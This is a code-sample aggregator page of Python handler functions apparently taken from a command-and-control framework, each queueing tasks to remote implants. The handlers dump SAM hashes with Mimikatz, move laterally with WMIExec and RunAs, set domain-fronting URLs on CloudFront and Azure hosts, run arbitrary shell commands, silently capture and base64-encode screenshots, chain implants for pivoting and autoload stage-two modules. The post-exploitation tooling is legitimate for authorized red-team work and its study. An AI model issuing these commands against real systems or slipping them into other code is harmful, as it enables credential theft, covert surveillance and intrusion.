Пример #1
0
def do_rotation(user, command, randomuri):
    domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
    domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
    new_task("set-variable -name rotdf -value %s" % domainfront, user, randomuri)
    new_task("set-variable -name rotate -value %s" % domain, user, randomuri)
Пример #2
0
def do_get_rotation(user, command, randomuri):
    new_task("get-variable -name rotdf", user, randomuri)
    new_task("get-variable -name rotate", user, randomuri)
Пример #3
0
def do_stopsocks(user, command, randomuri):
    update_label("", randomuri)
    new_task(command, user, randomuri)
Пример #4
0
def do_reversedns(user, command, randomuri):
    params = re.compile("reversedns ", re.IGNORECASE)
    params = params.sub("", command)
    new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
Пример #5
0
def do_ps(user, command, randomuri):
    new_task("get-processlist", user, randomuri)
Пример #6
0
def do_hashdump(user, command, randomuri):
    check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
    new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
Пример #7
0
def do_pbind_loadmodule(user, command, randomuri):
    params = re.compile("pbind-loadmodule ", re.IGNORECASE)
    params = params.sub("", command)
    new_task(("pbind-loadmodule %s" % params), user, randomuri)
Пример #8
0
def do_get_screenshot(user, command, randomuri):
    taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
    new_task(taskcmd, user, randomuri)
Пример #9
0
def do_invoke_wmiexec(user, command, randomuri):
    check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
    params = re.compile("invoke-wmiexec ", re.IGNORECASE)
    params = params.sub("", command)
    cmd = "invoke-wmiexec %s" % params
    new_task(cmd, user, randomuri)
Пример #10
0
def do_invoke_runas(user, command, randomuri):
    check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
    params = re.compile("invoke-runas ", re.IGNORECASE)
    params = params.sub("", command)
    cmd = "invoke-runas %s" % params
    new_task(cmd, user, randomuri)
Пример #11
0
def do_get_implantworkingdirectory(user, command, randomuri):
    new_task("pwd", user, randomuri)
Пример #12
0
def do_remove_servicelevel_persistence(user, commmand, randomuri):
    new_task("sc.exe delete CPUpdater", user, randomuri)
Пример #13
0
def do_startanotherimplant(user, command, randomuri):
    new_task('startanotherimplant', user, randomuri)
Пример #14
0
def do_shell(user, command, randomuri):
    new_task(command, user, randomuri)
Пример #15
0
def do_invoke_daisychain(user, command, randomuri):
    check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
    urls = get_allurls()
    new_task("%s -URLs '%s'" % (command, urls), user, randomuri)
    update_label("DaisyHost", randomuri)
    print("Now use createdaisypayload")
Пример #16
0
def do_loadpowerstatus(user, command, randomuri):
    update_label("PSM", randomuri)
    new_task(command, user, randomuri)
Пример #17
0
 def autoruns(self):
     if "C#" in self.Pivot:
         new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
         new_task("loadmodule PwrStatusTracker.dll", "autoruns",
                  self.RandomURI)
         update_mods("Stage2-Core.exe", self.RandomURI)
         update_mods("PwrStatusTracker.dll", self.RandomURI)
         new_task("loadpowerstatus", "autoruns", self.RandomURI)
         update_label("PSM", self.RandomURI)
     if "PS" in self.Pivot:
         new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
         update_mods("Stage2-Core.ps1", self.RandomURI)
     if "PB" in self.Pivot:
         update_label("Parent: %s" % self.IPAddress, self.RandomURI)
         new_task("pbind-loadmodule Stage2-Core.exe", "autoruns",
                  self.RandomURI)
         update_mods("Stage2-Core.exe", self.RandomURI)
     result = get_autoruns()
     if result:
         for autorun in result:
             run_autoloads(autorun[1], self.RandomURI, "autoruns")
             new_task(autorun[1], "autoruns", self.RandomURI)